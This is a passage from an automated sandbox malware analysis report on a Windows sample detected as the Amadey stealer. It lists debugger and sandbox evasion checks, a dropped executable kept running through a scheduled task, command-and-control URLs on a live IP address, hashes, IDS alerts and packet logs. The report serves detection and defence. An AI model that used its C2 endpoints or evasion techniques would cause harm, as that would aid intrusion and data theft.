                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 30000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread delayed: delay time: 180000Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: file.exe, 00000000.00000002.1829997144.0000000000F72000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1859556418.0000000000932000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                  Source: axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Hides threads from debuggers
                  Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeThread information set: HideFromDebuggerJump to behavior
                  Potentially malicious time measurement code found
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_05160BA6 Start: 05160C51 End: 05160C4D5_2_05160BA6
                  Tries to detect sandboxes and other dynamic analysis tools (window names)
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: regmonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: gbdyllo
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: procmon_window_class
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: ollydbg
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: filemonclass
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: NTICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SICE
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeFile opened: SIWVID
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04EA00CF rdtsc 0_2_04EA00CF
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0076645B mov eax, dword ptr fs:[00000030h]5_2_0076645B
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0076A1C2 mov eax, dword ptr fs:[00000030h]5_2_0076A1C2
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                  Source: axplong.exe, axplong.exe, 00000005.00000002.3014416307.0000000000932000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Program Manager
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0074D312 cpuid 5_2_0074D312
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeQueries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_0074CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,5_2_0074CB1A
                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 5_2_007365B0 LookupAccountNameA,5_2_007365B0

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Amadeys stealer DLL
                  Source: Yara matchFile source: 1.2.axplong.exe.730000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.d70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.axplong.exe.730000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.3014325305.0000000000731000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1829925792.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1789238154.0000000004C80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.2185572649.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1819093932.0000000004A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.1859481096.0000000000731000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		12
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Scheduled Task/Job                  		1
                  DLL Side-Loading                  		1
                  Scheduled Task/Job                  		251
                  Virtualization/Sandbox Evasion                  		LSASS Memory741
                  Security Software Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		12
                  Process Injection                  		Security Account Manager2
                  Process Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS251
                  Virtualization/Sandbox Evasion                  		Distributed Component Object ModelInput Capture11
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                  Software Packing                  		LSA Secrets1
                  Application Window Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  Account Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Owner/User Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                  File and Directory Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow224
                  System Information Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  file.exe53%ReversingLabsWin32.Packed.Themida
                  file.exe100%AviraTR/Crypt.TPM.Gen
                  file.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%AviraTR/Crypt.TPM.Gen
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe53%ReversingLabsWin32.Packed.Themida

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://185.215.113.16/Jo89Ku7d/index.phpf100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpded3100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php100%Avira URL Cloudmalware
                  http://185.215.113.16/100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpD#100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpL100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phph100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpK100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpdedG100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpg#100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpD100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpncoded4100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php8100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpZ100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpX100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpded100%Avira URL Cloudphishing
                  http://185.215.113.16/X(6I100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpt100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php1100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.phpncoded100%Avira URL Cloudphishing
                  http://185.215.113.16/Jo89Ku7d/index.php0100%Avira URL Cloudphishing

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phptrue
                  • Avira URL Cloud: malware
                  		unknown

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://185.215.113.16/Jo89Ku7d/index.phpD#axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpLaxplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpKaxplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpded3axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpg#axplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phphaxplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpdedGaxplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpfaxplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpDaxplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpZaxplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpdedaxplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpncoded4axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php8axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpXaxplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/X(6Iaxplong.exe, 00000005.00000002.3015738567.000000000129A000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phptaxplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php1axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.php0axplong.exe, 00000005.00000002.3015738567.00000000012C9000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown
                  http://185.215.113.16/Jo89Ku7d/index.phpncodedaxplong.exe, 00000005.00000002.3015738567.00000000012AF000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: phishing
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.16
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518174
                  Start date and time:2024-09-25 13:51:18 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 51s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:7
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@4/3@0/1
                  EGA Information:
                  • Successful, ratio: 33.3%
                  HCA Information:Failed
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Execution Graph export aborted for target axplong.exe, PID 3384 because there are no executed function
                  • Execution Graph export aborted for target file.exe, PID 2672 because it is empty
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: file.exe

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:53:02API Interceptor1305996x Sleep call for process: axplong.exe modified
                  12:52:23Task SchedulerRun new task: axplong path: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.16file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, CryptOne, PureLog Stealer, RedLine, Stealc, Vidar, Zhark RATBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  file.exeGet hashmaliciousAmadey, PureLog Stealer, RedLine, Stealc, zgRATBrowse
                  • 185.215.113.16/inc/newbundle2.exe
                  file.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  jD6b7MZOhT.exeGet hashmaliciousAmadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer, RedLineBrowse
                  • 185.215.113.16/inc/XM.exe
                  VtbX3CKBMT.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php
                  UzOiLxrF4d.exeGet hashmaliciousAmadey, NeoreklamiBrowse
                  • 185.215.113.16/Jo89Ku7d/index.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLwkoozurOWo.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  86aY1jzemK.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  iubXkDP5lk.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  yjzllYsjlU.exeGet hashmaliciousAmadey, StealcBrowse
                  • 185.215.113.103
                  IWXaKkm4pm.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  p3aYwXKO5T.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  A1E1u0Rnel.exeGet hashmaliciousAmadeyBrowse
                  • 185.215.113.43
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103
                  file.exeGet hashmaliciousAmadey, Go Injector, XWormBrowse
                  • 185.215.113.16
                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                  • 185.215.113.103

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):1965056
                  Entropy (8bit):7.9503823882866875
                  Encrypted:false
                  SSDEEP:49152:Zzuatph4L2H+Ug2sf77jALl77nXmwDdRAbh0SbTPsAEpKE:duqph4L2exT7MB77nXmwI7cF
                  MD5:48D34A4AC51F1A89E010B64FA8CFDCC2
                  SHA1:EF2A194FBB28562AFC735AE4EE74429521EF9105
                  SHA-256:AC848E3AF9A5738EF6791DAFA2A763A7718C25F1DF48A6430827CABE9A5D68F2
                  SHA-512:63FD4531148CA40FA60997692A79E678DCBC032153204CBB591831478AAEE70CDDE3B7568B8FDAE12F995BEB84C687BBCF23E094B2FA5E588BB531F0F7A50B28
                  Malicious:true
                  Antivirus:
                  • Antivirus: Avira, Detection: 100%
                  • Antivirus: Joe Sandbox ML, Detection: 100%
                  • Antivirus: ReversingLabs, Detection: 53%
                  Reputation:low
                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L....@.f..............................M...........@.......................... N...........@.................................W...k.............................M...............................M..................................................... . ............................@....rsrc...............................@....idata ............................@... .@,.........................@...sfekpzlc......2.....................@...vvjbpxjb......M.....................@....taggant.0....M.."..................@...........................................................................................................................................................................................................................

                  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:modified
                  Size (bytes):26
                  Entropy (8bit):3.95006375643621
                  Encrypted:false
                  SSDEEP:3:ggPYV:rPYV
                  MD5:187F488E27DB4AF347237FE461A079AD
                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:[ZoneTransfer]....ZoneId=0

                  C:\Windows\Tasks\axplong.job

                  Download File
                  Process:C:\Users\user\Desktop\file.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):286
                  Entropy (8bit):3.442417590930785
                  Encrypted:false
                  SSDEEP:6:wvXwpXpRKUEZ+lX1lOJUPelkDdtPjgsW2YRZuy0lbctyut0:ag1pRKQ1lOmeeDHjzvYRQVYtyut0
                  MD5:0E43DDF646A8A425C508F14A0B8AA20D
                  SHA1:151D532BF065090573041060792C8E40487C8DCC
                  SHA-256:2FDC4E9B7C76D8697D09208EB6959AA58C538C592517C69B6C8B3DA37D6891C4
                  SHA-512:2B5C374B5227BD2DE8EB63D821D5970D803B72C635150E800A167573E54A6C1773A0A22A5D752B023DEB26F48785CCA99FF22A1E68C0937CFE385B27F669FF42
                  Malicious:false
                  Reputation:low
                  Preview:....2.....J._...".9F.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.4.4.1.1.1.d.b.c.4.9.\.a.x.p.l.o.n.g...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................5.@3P.........................

                  Static File Info

                  General

                  File type:
                  Entropy (8bit):7.9503823882866875
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'965'056 bytes
                  MD5:48d34a4ac51f1a89e010b64fa8cfdcc2
                  SHA1:ef2a194fbb28562afc735ae4ee74429521ef9105
                  SHA256:ac848e3af9a5738ef6791dafa2a763a7718c25f1df48a6430827cabe9a5d68f2
                  SHA512:63fd4531148ca40fa60997692a79e678dcbc032153204cbb591831478aaee70cdde3b7568b8fdae12f995beb84c687bbcf23e094b2fa5e588bb531f0f7a50b28
                  SSDEEP:49152:Zzuatph4L2H+Ug2sf77jALl77nXmwDdRAbh0SbTPsAEpKE:duqph4L2exT7MB77nXmwI7cF
                  TLSH:779533E32E2F3326D03CAB7481B77B04A730840D02263B9969E5655FDEF7B052DEA495
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                  File Icon

                  Icon Hash:90cececece8e8eb0

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-25T13:53:23.088893+02002856147ETPRO MALWARE Amadey CnC Activity M31192.168.2.449753185.215.113.1680TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Sep 25, 2024 13:53:04.668065071 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:04.673172951 CEST8049736185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:04.673290968 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:04.673736095 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:04.678555965 CEST8049736185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:05.373408079 CEST8049736185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:05.373516083 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.375698090 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.380578041 CEST8049736185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:05.603123903 CEST8049736185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:05.603250980 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.705058098 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.705862045 CEST4973780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.710649967 CEST8049736185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:05.710777044 CEST4973680192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.710798025 CEST8049737185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:05.710884094 CEST4973780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.711065054 CEST4973780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:05.716218948 CEST8049737185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:06.430521011 CEST8049737185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:06.430610895 CEST4973780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:06.431566000 CEST4973780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:06.436398983 CEST8049737185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:06.660629034 CEST8049737185.215.113.16192.168.2.4
                  Sep 25, 2024 13:53:06.660754919 CEST4973780192.168.2.4185.215.113.16
                  Sep 25, 2024 13:53:06.767313957 CEST4973780192.168.2.4185.215.113.16
